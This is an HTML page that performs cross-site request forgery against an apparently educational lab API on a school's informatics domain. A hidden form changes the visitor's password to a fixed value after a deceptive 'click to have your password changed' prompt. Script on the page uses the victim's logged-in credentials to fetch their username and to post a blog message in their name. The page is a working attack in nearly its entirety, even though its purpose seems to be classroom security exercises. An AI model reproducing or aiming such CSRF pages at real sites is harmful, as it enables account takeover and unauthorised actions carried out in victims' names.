<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <h1>Password</h1>
    <p>Click to to have your password changed!</p>
    <form method="post" action="https://m183.gibz-informatik.ch/api/csrf/changePassword">
        
        <input hidden id="username" name="username" value="TimoCapi" />
        <input hidden id="password" name="password" value="Pa$$w0rd"/>
        
        <button type="submit">to</button>
    </form>
    <br>
    <br>
    <br>
    <h1>EMail</h1>
    <br>
    <br>
    <br>
    <h1>Blog-Post</h1>
    <p>Click the following button to write a random post</p>
    <button type="button" id="post-message">The following button</button>
    


</body>
    <script>

        async function fetchUsername() {

            const response = await fetch('https://m183.gibz-informatik.ch/api/csrf/getUsername', {
                credentials: 'include'
            });
            const username = await response.text();
            document.getElementById("username").value = username;
            console.log(username);
        }

        fetchUsername()


        async function postMessage() {

            const blogMessage = new FormData();
            blogMessage.append("message", "Boop!");

            const response = await fetch("https://m183.gibz-informatik.ch/api/csrf/postMessage", {
                "body": blogMessage,
                "method": "POST",
                "mode": "cors",
                "credentials": "include"
            })

            if (response.ok) {
                console.log("Very good!")
            } else {
                console.log("NOT so very good!")
            }
        }
        document.getElementById("post-message").addEventListener("click", () => {
            postMessage()
        })
    </script>
    
</html>

